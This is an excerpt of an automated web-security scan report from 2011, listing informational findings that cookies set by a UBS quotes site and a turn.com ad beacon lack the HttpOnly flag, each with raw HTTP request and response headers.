<H1>Found</H1>
The document has moved <A
...[SNIP]...

10.61. https://quotes-public1.ubs.com/app/CGT/Workbench/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/ HTTP/1.1
Host: quotes-public1.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815; NavLB_PQ=quotes-public1.ubs.com

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:52:25 GMT
Server: Apache
Set-Cookie: Navajo=Oomvgp9vP3Ft8Qme0xj/ea+sM9tLIa0aq2VJZr9IfFggC27Pyuw23/id1aMLQ/bugMyFA28yaAE-; Path=/; Secure; Version=1
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache="set-cookie, set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close


10.62. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/home HTTP/1.1
Host: quotes-public1.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815; NavLB_PQ=quotes-public1.ubs.com; Navajo=Oomvgp9vP3Ft8Qme0xj/ea+sM9tLIa0aq2VJZr9IfFggC27Pyuw23/id1aMLQ/bugMyFA28yaAE-

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:52:26 GMT
Server: Apache
Set-Cookie: ubslang=en-US; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:06:32 GMT; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/legChooseDomicile
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


10.63. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/de

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/lang/de

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/CGT/Workbench/wb/lang/de HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:51 GMT
Server: Apache
Set-Cookie: ubslang=de-CH; Domain=.ubs.com; Max-Age=2147483647; Expires=Mon, 24 Jul 2079 17:21:58 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=wwy/bl/536LcaMPi7GA/Za5JB+9u0vIfbxz1PWDLCjlHhr4eOK5kCvNkSrvKkTm5roTeIgMCGhY-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


10.64. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/en

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/lang/en

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/CGT/Workbench/wb/lang/en HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:53 GMT
Server: Apache
Set-Cookie: ubslang=en-US; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:21:59 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=6G2OGI4Mofoqm3Bjc1IRFE50rP8F7k2B0jFsSxftOEdoQcPDAFecRqYUR7Aq9MgK2AOPyJpTcGA-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


10.65. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/fr

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/lang/fr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/CGT/Workbench/wb/lang/fr HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:52 GMT
Server: Apache
Set-Cookie: ubslang=fr-CH; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:21:58 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=Wyg33L33zBKvKRR1J07MC3T0k3Ho/EjMtEtx3rdubNAr32qz8nf8xwGoImu5je3zV/T53mEjDdg-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


10.66. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/it

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/lang/it

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/CGT/Workbench/wb/lang/it HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:52 GMT
Server: Apache
Set-Cookie: ubslang=it-CH; Domain=.ubs.com; Max-Age=2147483647; Expires=Mon, 24 Jul 2079 17:21:59 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=tyKPlvE7DsLkcB09TcOGFUhMhpU2+qTbpNwNpzilJDEKEJ4haF5DeoAANdBD35geyk8nTgKuvAI-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


10.67. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/pageGroup/wb_pg_mi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/pageGroup/wb_pg_mi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/pageGroup/wb_pg_mi HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:54 GMT
Server: Apache
Set-Cookie: Navajo=TXSpnkWPb7ORQn1naHpHOSB0Kvh2w+94kwSVaivyLBZxXXRnyRqWyvT03z0vyA91oGgM4nXDSkc-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/legChooseDomicile
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


10.68. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=dLIuOGfOzkZylUaPcW45J1NM3fA_ZnR2d4cPbuMElFEvYxI1ZImxMCpPyY8hh_IBrR-1pVaDIemsGHXtH-_-EA&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=jPCRKqrj87qIJxtlMQWAeEChT2n2hjlNeUtfI18EVvCY481wEkFtGX7HudJA1SwJI3d8wh-8F3M_mXcdjcS-VSm0eLaoIKxUGXp9LrfCkU9_tnfsaUjBl08t5WPRK0VURVro0VaYJSFBW8ummLzmaIKBmXLKaNQC_VstFH2_fFpKQkzhSzd0OA7TdBU9TjZEJGXtc03lRAW7XQ4DISJNToVALrQWz2MTLkxqGX2dkixiiuCgw-RUBPrhyXIonq-JO1Bp39fVI570M3anNYXEeUs1tPAJ0EW-1VMg8V7a5wldzyMGDGIyTnWkwLiiAh9MnoUAhDiUl9Tegk8e5loBtCPfUfWmFvuHa7ho64SbyNRCdB0gGLuWZn2SFARzFJPESwQcmlx05sJTCiLTcgCP4At5Nkw2i8ci7zeXoamyfIkXLuYA-Dhd_NCbS18tUNtNvkWLzJ6aRrpGreADONKQFjqdAq7HLak39li3oOzBb2LeZa7kJWdY4s3_LxRnaveh3zRKhr_QKICSCDvtEvXL5bc_DW9fRIIhGqjaZpBQKPuvEW4pltifd2UFOGJBUm-HNrIvCCgnCtouI-Uiugr_XDqnokT_uSlOVd9om3L3_Zyu-SvKhx26d2lgxRL2g7NnpnufmqwPr0iX6TO_QvAchAci1X1kdq4IOav-VGBUnPFENQMte8mJeFRkxXb-wFJ5RVro0VaYJSFBW8ummLzmaNGHuZ00Doye8JlLv5mr5PFKQkzhSzd0OA7TdBU9TjZEAKZ1XvhQcWRwSquFFdyqk27PUbblbYukMk_ukxgrNp1iiuCgw-RUBPrhyXIonq-JrVUsFGMjIsjG4wG8JccNY0s1tPAJ0EW-1VMg8V7a5wn-FB-cNjGuev6cKfXYBTnN0_vou2SdMt8u86ZsS3JrqiPfUfWmFvuHa7ho64SbyNQHZddyBwQ_bn6DeUZJIktJSwQcmlx05sJTCiLTcgCP4PkIlx5s8TLQpLlToa_KmjIJFHg-6pvIHl5Jd-boptVivkWLzJ6aRrpGreADONKQFi1uWhCbBLDkUUl3GB-cia7eZa7kJWdY4s3_LxRnavehkKIyZUcKn4gaSbbrzqSrcgqUnZs_qTc4J1uECWvW6WbTYemUMl4rww0Ahse7Jfbjh8YLajdpYA5oCRPEinWDNzqnokT_uSlOVd9om3L3_Zxs-1IWnYFHuATbbO_y4X0qnTAQXKSKZxRRHNLIhO3aIaSqEypMHifOKCbgAvu2-dYixi2mthDBgkkh8E1XVaeYRVro0VaYJSFBW8ummLzmaFVfdYHK1Q73JpHXN0tZ5ChKQkzhSzd0OA7TdBU9TjZE1kmOSSok1OTXuW9iz2m4nL5yE_6sd6seuxofVhtsYmBiiuCgw-RUBPrhyXIonq-JQurUvISATSSNOXvmuhMCV2KK4KDD5FQE-uHJciier4klqT8ZcugfJqC9EwK5ktSgSzW08AnQRb7VUyDxXtrnCWozIMOsCXwOUoX3GwmeVVAxi8wzskQPsxtBtldyMSwagsPhD5djythOHSHCTJOhXN8kothY4cGzuNEdryxzqqlLBByaXHTmwlMKItNyAI_gA5nIMgtWWpg9SGtTLubci8mKqUVNtCEf11hjerFm783rueT8thuReMGYM-G8N401JqMaNEKucbt7MzwWQQWU-d5lruQlZ1jizf8vFGdq96EVQq5esqu6oyUY2zlzU2xLXWhOIfbu6nlVGazQ3C00oYS8zm8KaUf2JPX_XkHFplCbza_ABfjL7BKJWmajZwI8OqeiRP-5KU5V32ibcvf9nKIPnlMyG4VsL_dpoB-0W9QGvLE_z_KyAskRioKbfxN_786M9IuI8BYnDc-poA-MUnfZxmx8Z1na_56NWnVp5lVFWujRVpglIUFby6aYvOZo-guTtl2FC1HRuw7-BKiPgkpCTOFLN3Q4DtN0FT1ONkRfEwEV-i4hDFcRNIjoo
2NgkPVO08UdjTRS6iKsNti_SGKK4KDD5FQE-uHJciier4kPyz-Wufncl9LyPoL9B1QKSzW08AnQRb7VUyDxXtrnCYqBIOxmA7cQDFoERRAumqjQS-E5nxed_shBlbXuObLDI99R9aYW-4druGjrhJvI1JH00lIUEmEEA_OFUDNzutxLBByaXHTmwlMKItNyAI_g_3bTqCYCGbHkXEVzPY_01mXeNri_O61lm1ldtHVrpR7ZPRGnTyb4BtK8arS2F9YZe4UCz5TMA5hwrPrqery6C_wkRIQCoel50LHttKKxvj2T-81UMTQPlYAknpDpTSLEO5HiathQKE8omxVc53FpCRoxDfNmYDnxg0EvFrwRe3pCS4dcida2s-s0XQ4z8fCn0-2F-mOoQpGwjdYnRQCARZtq_gHnWf9fXfe0G5ZJVnGpH8LKKIm0TYD_Luo27v_Fd79BPBBGXhysRhWpW1cyG4cyxzjZGmjTf1aqiATmAjS8PU8Ims583iYmtl6BnonGOZ_I42pI-l997CutSY5UTnU6t7Hj0VsEozVWpOhdHdFbLfPqvGJUWoA-TUxLJGtuWy3z6rxiVFqAPk1MSyRrblst8-q8YlRagD5NTEska26shJ8rvIZ2pEIvj7vJYr_-ftZVQVVx5oyA1oNVdb0c2RvgUG90xsnNOLDcsndxj6Hfhp4cgON-zdligsRs6_1T34aeHIDjfs3ZYoLEbOv9U9-GnhyA437N2WKCxGzr_VPG0U7eaD3Hbtxwd0g2BAEnxtFO3mg9x27ccHdINgQBJ8qENCoPz5YPQkhGm2FiUj3LFz3e1wa31-DKI83R83jg3QTL9zDrzTFlXoiMqjuSWt0Ey_cw680xZV6IjKo7klpI3j9xuCx21BIxBdXN5YAR9AhrAwqavcLA2O6a4z37Lsij7qsRPo1Q9IcnQsYBZ5nZ4Yik6WYEG4S1yIWi95cAawB_d25XmA1YnkFKy4M4_IsLKOVSlL41zvQ6wOKAHEjq7nKInFrgoG_62xoiLBKT6u5yiJxa4KBv-tsaIiwSk-rucoicWuCgb_rbGiIsEpOvDsfne5seg63D4x3flsyZrw7H53ubHoOtw-Md35bMma8Ox-d7mx6DrcPjHd-WzJlOSrp14Y383TLXFJ1T7HeQDdh5RodnqZ0dgGASOf1Fng3YeUaHZ6mdHYBgEjn9RZ6k3CneyeK26bqX2BslrNlwDg97pn0xq8XVtSFY17J1rA4Pe6Z9MavF1bUhWNeydawOD3umfTGrxdW1IVjXsnWsZmDwoJlEZXfDBjNrKbkdHGZg8KCZRGV3wwYzaym5HRxmYPCgmURld8MGM2spuR0cbb0sPsXWgw_x9D6jnx5LK_2BhDosUowXxXmwB90G1tj9gYQ6LFKMF8V5sAfdBtbY_YGEOixSjBfFebAH3QbW2GhE7gFloT4X513bbUoowJpoRO4BZaE-F-dd221KKMCaaETuAWWhPhfnXdttSijAmjoFfr6E7AtWKXcAv7zPgNhKraltt_znEUtPzey_YSNRSq2pbbf85xFLT83sv2EjUUqtqW23_OcRS0_N7L9hI1Fz-QUXxY9m0RT2v_0PtAEz3vMJW6Nolrhqx2yRbBnwHeM8DMgjvm5t97BtYytOx4Rqhj3O8p-XR3nA6DvXKpTl; 
fc=NPwnTj55SxablmgxgOU6YvTAau0fxQm9Ss2FVtOc0fRwe2fiMiJstcorldPAQEWsjtR00WuVUesotFeF8b0iqzTwskhjzr5X5fLnW2Y1L8oWeSZAoSqfzCTWGJqSVzUxwmWj6rOwJQbNe1FGkQ72Mr3ZyRv0KSWu8UtGn86vdZZ2Bxw8hDOLkguYqml5zW-MINBiIQ09VuaB6H4kNZ3jvWDXo_Ub5NvFSqNxsTqhNOEJzdGEYQUbYRsENlG1EkxlHr-vpMpIww2oeMaNqJcAGNVCVYgScgvT-7lnf3tWEtoI26ZIhO_EYD2Jv5etTb7nPXORZ_ihz3v_EDqUfBGd38kaFp7wmgHwSln4BB0aAU-Y-fE6mCrmAAKxJpNINZh0gYrE3U6bhGdZv_0Ofvauqo02tkR5MgBK5U8r1oXGHyKLM2r82BMAlsOE4kKakojRElg7FxL2FmmNWsvuLk3EV1Ob1kR0cv3Vim-wWYu2PuOaPtJF5zGBev3l88f3V44c; pf=imLa8Y9K7y9JWjvDp9rzLXdg786oafP5T-2J8P9-MbRqAdtWEIdLx553uOXwyk_d7lMV6ku5x6Fs62Dm_QelJC3HNez-Z8pMdla1M14yZ1aXhaLn0WGDkLMH4cxWtxtJnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB_k59seAzgg1-n2fcjLvpOMi9tA_b87Jqn_e3gK2wczGx_CWj995ZG4J9ayZG8Azab13_ic6bm3qPlYluqL2y0jaU-Oqt1gdom4zJIFfDwZ9PMXsV2RPLlXKhVOkCzWSAMHy8NkV9GlxOD5jcadlcpoFV-_N4_TQoIGyiXOJHiskWx1ZATf6jr6V7CCyVFok1rG6pyhUqm2FHzEiDJ6sf-pacXWwno-sBBfZi85NtW5Qt-_BHDFm96AL-Hlvz6iB4BqpqgoK--2Z8dYtNlLNE0_IPCGGg4JuduY91z0-G9PFEs00MFyErnctvH2BT73d3_FZBD7b-KShsGHFtw-PJccEMxwAG8SoEVS9m9Zd2vmWErUUgLCw4NxIwxNfjDRkuTL2j5Yg93F_QOtFzYyWOePChv1i2naEiRm-G40oRJBGTBpVCc0qMQ7XSXeQvsWsjFHiMSxf4LuiqRb7JIEpKg8kby9cY_1mRgRy-7Zp8tzhfOiqJ0pMkyWUtj3tCfqb_tGZRzNBjxRhmI6dM4mbZKOYU4-nV0UYeEGUxF1S_oHu4hFkzr5r4tc43qm6cSueuRO2hVcsSqb840lbAIGS9ubZxGaNUCyMdwNgf2avKHVNnolOOu7jj76mTVAdA_mdYfmHtPNZuqI_jxiXxEOs5H0vlfIlKbmfHqHUcP5b-IIns1zek1KJ0W2qXBTetRtqOYNCGSsyjP4AXt3T9RPBVkJDNnxwnTaHhSt6_M966_yDGRntkal431Er-D6EvQQXSzw07Q7-ZTvu6ltuMBngQyhlUXNT1Hb5nCH2u9H8JYL2vqi7ZcubYPjdCiTEvC6ixvxWnBAvvN4YHBYs623Zfp7mYinN8F-xomiNBADxpAVRXj30kPclrBAUX47luAB61FeciHDtDUZA6oDA9lgECWxePb1qgK2wydMqKon7gU_K8C3sxgZqLnqGwdljDWk8V-5saTK0J9MhEtW2SZi442SAJJiCcWe8XmAo-ZeIFD11aDlRV7nM6V6_zFKpP7wlLYQPKIschJVNwDZdXQ9qmKL_Qbi_JfgEHW4reZkqoXAIHtX_b9gyna0u7aW5BDNIqsWhukbMM8brSoTtnUG56p5TJB44WFzdjkM-mROp9OOL7FDQ7cHkGLYBuqZ3lgWaipiAFXhGx2dqcch-VuzoEikRXiOR4xa
xbvDpaqAiEb8VhvKcFx-ovh4Sl88FoBqgf0tyxN9W-kw0R4q9C5CmY2JUjJXnRD7WzNJZ_sCBAgpM1TWvCRlVZFXXZnqNPukYr_L3KLsKcRyxoRdaMovUBfTNEPRSKFgtbcbx8BqX90ZQQcpEfWqJMVmEBPEAIGejpPCFWKz3O59OPx58buvJ_uvNLcUoXM2ObJkBpZIBDJKm2ziC3HJIl0BWgLsB3Xb9sspub1VzehZ-dnjQrUAX1RWz23DJ4AN2p3Bkps3nmT_CyZOWO0K6AmyoJJ0WVqwfHJmkvMMecgZzynLsGgRc_i10bzP3aegk4VhMUbe1DPDoRajStMsbCQClj0a4aNFYQ33AhPyEf_pRhJLMk6r38S9EXL7rx5ntmq24iXH1baYIQ5WA9IExVRwqhQKkb2ecnJ-2UOQj0PVB__QK20iFxmMrBi_Ozk9p2lUUv6L37oAr_AV6d2dHRLCHQNMiRthyWEMiVlxcMdEeKLokMX7jcq64dIsZNbiFzVInJ14TCwCQ9fqReykA8qBRaCLn3AdbjtskBuPk60M0N683DQsE4ZC-hxMORC22isekOI2V75sPw5QLpTHbDx3qmiChRuhkT71jvR1w1cjNDo5Itf_BvoKeVF3ZR9-1s7QiDoMPUY-ZVqhnCeQMjDTZrbWEsRIvXQWcM2EqCJfHKFgH6ShjUTMi6Fy8HuTX3hHZqIyshrEm0-qlU6GLKu8GfLpkN0bDQNM4p86wye9uBqQI4_fI7zC0JJ2DuRXGxP-2g9_CgYuY8pN_VrecGDh6UwTrru9GLmwxbidN1AUdQybKB4VyjEokVAfrO6zFP7ekqOUhJzASYimudaJc-nqwrLqeBidwfS-yH1nGi3UeGqKb9R2O8_f7i8ovAE8EZ8c3EpZGfdvY3YmYKNPM3iO16JJWQBvkviQa82CG4NkuHuK5hHF8F4pZHDyRRzEoRhIsHjaFVUhglHsoi-_gue4Y9GYFWcPlXqN1LcUW2PklnchprXEhv3r7HtHIEvOa8bUpKMjK8lg77zJlCabEdFr8zLsnvY_jhe-w8LS7NnrSfPrT7_ys5OYzXfKqxN9PqlPQO7yAyIRqyycyKA8i0F3zIMbv5tUub_jys2KG-DoXTNzLTlHYmH8wMN_undN9fZc-pI0Ny4hubjOBUf2DQSm9Ohj3B7jgP9CCqG8Wt-ubVX90wI71XdOFbmuO_nu7xzWg1owdmgiD4haU31wETkVUs2IUBSWSwU9HuGqutvFVd-RPEMlRmI-tk5XQOBLE3hkIaiREQLK5qM9EX44AOJlvs8DYm-_z8wtr-sIKH6L02PQc77v8w4KeUWdpWld1cOt5B9y5dzZtTu3JqKGLAN1pzcD0dPfCuBK65VIPkK5kWZct35sO1Zn7pXWDz9pp4ib7xIdhf9zRg7pMNE_CJ40sHgFesrKS-sIOtZ0uWaFVuInERcUbOl0hZVWfZ4IPC39oh4ISFoEomPNyVVtSZY1RAo6Ssw0gNhdaAh0ubUxGmkN2fgVgehhyd0pky1b6ARNsIvyharCLLEFwpnlzXrhrzzYYv8tbnjLz1Zdsb_zZj1IfqS_aLZsRx-RLssOEi8Ic52I1SwSEzv1L7Xgy2Eldwn0osGTLllLrxdLGKvBbatPkttpJfAXFMB_81ZZqVp19l6yq--kytbvLV02MMBRF8QbYmkHZ9XZAHAsEZLsmJUb3ppXhtS9nRt7KX5Xvit0JJ8VmH7pEBcCAAwb_dsSSirzOYOWSpt9tKo6CdsoHgH6aru4Y4C1Oo_U7A4BsmBGEA7E6lGoeN4cYQLBhIGU78mY0O1B84kcRbagcEY3bvKO4WENO-4Aup8ydwoW1LAK5lzDCZf66Ro0bevR-FWOxJFZXHpkSB-wiy2euPF1s93pcsDAmXOMvRijJwI3i6Kr-KRd8-6tGKt3Z8Sx3Gwu4SNfNZ4Dc9CPpihH8V5KiSx-wwNBb6P5; rv=1; 
uid=4325897289836481830; rrs=3%7C6%7C9%7C12%7C1002%7C1005%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C18%7C2%7C5%7C1001%7C1004%7C1007; rds=15156%7C15153%7C15156%7C15156%7C15161%7C15153%7C15149%7C15146%7C15151%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Mon, 02-Jan-2012 15:39:04 GMT; Path=/
Set-Cookie: pf=jYpfHiwkL0q9Fc9kSjyuBBgn_wnb0_8qr_BqadU9rG7QZMj4YW4gjixh7pNwS2UBTEDZiJ73QG1Fncs-ZvtnGF1FGvBOgdBbEZX-YnBGLm7gM3D9ilPTjzMPHfvm2ZJRnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB-FVxq_hTarUuNMxmlOGv8i7uQNESU0ZB56kdO0OzIJXwIs_FraXwaqx9H3t0t_K8ypqvHTLNec123RZuM5_NQFc2SDKyJaL5qarBv4Mwfu6hbDkZ7-COXcc7J638-N2-nGmnSXYlumivx65OLyIDjkiclTN27E7VAjyP94ylXV2THc-FaZMQYHJfzm7Wd4vCeBVksj6qG_vGOBRszlEhTBHJJkbCwqlvtJ4YMajskqFiOxya5mnbA7S3fs-iJhVbcnz2gJQYfShI1TCMqbtLiB20vA45lRWnNPOHTjbHe0UEpEgz7rg3mBmvvpNOjjPm1ShVQJNOkuyKXxjHeUbdb1vdEe_5ovSouJNB12j0ymtjbRa7aarVBYGbRDMIU6CnuHCuJ-pktYTsiyWrGNv7OuJsye64pN7BOura6aOSSI4b0Rt8phWSAaqD7MP1KznZpkTlhpXh4-TTR0ThSULn8x1UaE9wNorS3GYtjFZhcRVjJtfcYNkhzgDL3eMoWYNnYZqDKZRMvFd1ZKcUJuq_zhyyoX1Pm8pjzP3_QghQ9Mhio8jk9cro0gAwFF1DDFwTgH5PxTXVL6MoBnLB4b86CcB8cTKKUjKihGgM2TUJhZG3-h45YbzGndZUDHE2X88AvIcBSo3moUduDgWZjkDYofLI3QTC9S8KPN85sRP4COobdYXsT06PSNQWuuG0Xn65Z3TsjwnGp1987qUWPEQeKMZGxJcekloD_rTqVoMnmvyUxnoiuihCenkYB2EtVtlsCeyQt7jyEfnyFotaOujGmKeSahF2EZm46lAKLF003b0aLuJG6qbnKeGwdBvyJVdvGSPywaPWKJ5BRBfOF_6vvw0FtvmqU9JaAKw66loiImQTLzz78ETcLhQCLITMYwtftNww_XA-rRSdgEN76SA2KFbCG0h-75nZpxziOW1ekTf_IRDhOcOSKJofmwpZhjQmZKT3Nh_cPzwAkdpELNjsHGDgwfAOYMl-ze4C007tvDJ6VdfZ0Oh9nSGeaNSCn7BkNAtEibl5r00ChmOkCE37PQIS6dq7wPT-1B87w3eSIvWRK6JC2t1oeUqveL4vnLZ7v2BI8mOR_5Vtk4hl7LQbH47KHn9mApouFIrwoHgitvHAehUtrZB2pIKMrOd4ecGu_5Td_uxCtmy4XXdxPxi6IKIjh7TJldhJ1GEczWVD_bGDc5v-2kLO9WqTDY302oYnzhwqCcIDoCNscaj0YzBqlfTzIyDrkH8vxatsKDAXQ4Jtsl3_oK7x_ip5W7JjCcrLcd7TBTL-_O684O_LyajFvidwb0lwMpvI_qobXEf8vwpXx6CjgObJXPAwErnDdRiZXG6Rzjlrpvxx7MGKC7oc-DJnbgu8dTjdEu82cH1u